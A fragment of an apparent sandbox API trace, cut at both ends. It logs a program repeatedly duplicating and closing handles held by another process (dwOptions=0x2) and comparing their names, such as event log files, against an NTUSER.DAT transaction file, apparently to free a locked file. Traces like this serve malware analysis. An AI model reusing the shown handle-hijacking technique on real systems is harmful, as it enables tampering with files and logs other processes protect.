lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.537] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.538] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.539] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.539] CloseHandle (hObject=0x670) returned 1 [0154.539] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.539] CloseHandle (hObject=0x680) returned 1 [0154.539] CloseHandle (hObject=0x62c) returned 1 [0154.539] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.539] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x160, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.539] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.540] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.540] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.540] CloseHandle (hObject=0x670) returned 1 [0154.541] CloseHandle (hObject=0x680) returned 1 [0154.541] CloseHandle (hObject=0x62c) returned 1 [0154.541] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.541] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x194, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.541] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.541] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.542] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.542] CloseHandle (hObject=0x670) returned 1 [0154.542] _wcsicmp (_Str1="\\CatalogChangeListener-2c8-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0154.542] CloseHandle (hObject=0x680) returned 1 [0154.542] CloseHandle (hObject=0x62c) returned 1 [0154.542] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.542] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x198, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.542] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.543] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.543] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.544] CloseHandle (hObject=0x670) returned 1 [0154.544] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0154.544] CloseHandle (hObject=0x680) returned 1 [0154.544] CloseHandle (hObject=0x62c) returned 1 [0154.544] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.544] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x19c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.544] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.545] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.545] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.545] CloseHandle (hObject=0x670) returned 1 [0154.545] CloseHandle (hObject=0x680) returned 1 [0154.545] CloseHandle (hObject=0x62c) returned 1 [0154.545] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.546] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.546] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.546] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.547] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.547] CloseHandle (hObject=0x670) returned 1 [0154.547] CloseHandle (hObject=0x680) returned 1 [0154.547] CloseHandle (hObject=0x62c) returned 1 [0154.547] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.547] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.547] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.547] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.548] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.548] CloseHandle (hObject=0x670) returned 1 [0154.548] CloseHandle (hObject=0x680) returned 1 [0154.548] CloseHandle (hObject=0x62c) returned 1 [0154.549] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.549] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.549] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.549] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.550] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.550] CloseHandle (hObject=0x670) returned 1 [0154.550] _wcsicmp (_Str1="\\System.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.550] CloseHandle (hObject=0x680) returned 1 [0154.550] CloseHandle (hObject=0x62c) returned 1 [0154.550] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.550] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.550] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.551] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.552] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.552] CloseHandle (hObject=0x670) returned 1 [0154.552] _wcsicmp (_Str1="\\Application.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.552] CloseHandle (hObject=0x680) returned 1 [0154.552] CloseHandle (hObject=0x62c) returned 1 [0154.552] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.552] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.552] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.553] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.553] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.554] CloseHandle (hObject=0x670) returned 1 [0154.554] _wcsicmp (_Str1="\\Internet Explorer.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0154.554] CloseHandle (hObject=0x680) returned 1 [0154.554] CloseHandle (hObject=0x62c) returned 1 [0154.554] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.554] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x204, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.554] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.554] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.555] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.555] CloseHandle (hObject=0x670) returned 1 [0154.555] _wcsicmp (_Str1="\\Security.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.555] CloseHandle (hObject=0x680) returned 1 [0154.555] CloseHandle (hObject=0x62c) returned 1 [0154.555] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.555] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x210, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.555] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.556] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.557] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.557] CloseHandle (hObject=0x670) returned 1 [0154.557] _wcsicmp (_Str1="\\Windows PowerShell.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0154.557] CloseHandle (hObject=0x680) returned 1 [0154.557] CloseHandle (hObject=0x62c) returned 1 [0154.557] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.557] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x214, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.557] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.557] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.558] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.558] CloseHandle (hObject=0x670) returned 1 [0154.558] _wcsicmp (_Str1="\\OAlerts.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 1 [0154.558] CloseHandle (hObject=0x680) returned 1 [0154.558] CloseHandle (hObject=0x62c) returned 1 [0154.558] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.558] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x218, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.558] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.559] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.560] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.560] CloseHandle (hObject=0x670) returned 1 [0154.560] _wcsicmp (_Str1="\\Media Center.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.560] CloseHandle (hObject=0x680) returned 1 [0154.560] CloseHandle (hObject=0x62c) returned 1 [0154.560] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.560] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.560] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.561] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.561] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.561] CloseHandle (hObject=0x670) returned 1 [0154.561] _wcsicmp (_Str1="\\Key Management Service.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -3 [0154.561] CloseHandle (hObject=0x680) returned 1 [0154.561] CloseHandle (hObject=0x62c) returned 1 [0154.562] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.562] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x224, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.562] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.562] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.563] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.563] CloseHandle (hObject=0x670) returned 1 [0154.563] _wcsicmp (_Str1="\\HardwareEvents.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -6 [0154.563] CloseHandle (hObject=0x680) returned 1 [0154.563] CloseHandle (hObject=0x62c) returned 1 [0154.563] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.563] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.563] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.564] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.565] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.565] CloseHandle (hObject=0x670) returned 1 [0154.565] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.566] CloseHandle (hObject=0x680) returned 1 [0154.566] CloseHandle (hObject=0x62c) returned 1 [0154.566] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.566] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x22c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.566] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.566] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.567] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.567] CloseHandle (hObject=0x670) returned 1 [0154.567] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.567] CloseHandle (hObject=0x680) returned 1 [0154.567] CloseHandle (hObject=0x62c) returned 1 [0154.567] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.567] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.567] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.568] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.568] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.568] CloseHandle (hObject=0x670) returned 1 [0154.569] CloseHandle (hObject=0x680) returned 1 [0154.569] CloseHandle (hObject=0x62c) returned 1 [0154.569] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.569] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.569] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.569] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.570] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.570] CloseHandle (hObject=0x670) returned 1 [0154.570] CloseHandle (hObject=0x680) returned 1 [0154.570] CloseHandle (hObject=0x62c) returned 1 [0154.570] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.570] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x314, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.570] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.571] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.571] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.571] CloseHandle (hObject=0x670) returned 1 [0154.571] CloseHandle (hObject=0x680) returned 1 [0154.571] CloseHandle (hObject=0x62c) returned 1 [0154.571] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.571] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x318, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.571] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.572] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.573] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.573] CloseHandle (hObject=0x670) returned 1 [0154.573] CloseHandle (hObject=0x680) returned 1 [0154.573] CloseHandle (hObject=0x62c) returned 1 [0154.573] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.573] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x35c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.573] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.574] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.574] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.574] CloseHandle (hObject=0x670) returned 1 [0154.574] CloseHandle (hObject=0x680) returned 1 [0154.574] CloseHandle (hObject=0x62c) returned 1 [0154.574] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.574] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x40c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.574] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.575] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.576] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.576] CloseHandle (hObject=0x670) returned 1 [0154.576] CloseHandle (hObject=0x680) returned 1 [0154.576] CloseHandle (hObject=0x62c) returned 1 [0154.576] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.576] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x474, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.576] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.576] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.577] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.577] CloseHandle (hObject=0x670) returned 1 [0154.577] _wcsicmp (_Str1="\\Microsoft-Windows-ReadyBoost%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.577] CloseHandle (hObject=0x680) returned 1 [0154.577] CloseHandle (hObject=0x62c) returned 1 [0154.577] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.577] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.577] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.578] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.579] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.579] CloseHandle (hObject=0x670) returned 1 [0154.603] _wcsicmp (_Str1="\\Microsoft-Windows-GroupPolicy%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.603] CloseHandle (hObject=0x680) returned 1 [0154.603] CloseHandle (hObject=0x62c) returned 1 [0154.603] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.603] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.603] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.604] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 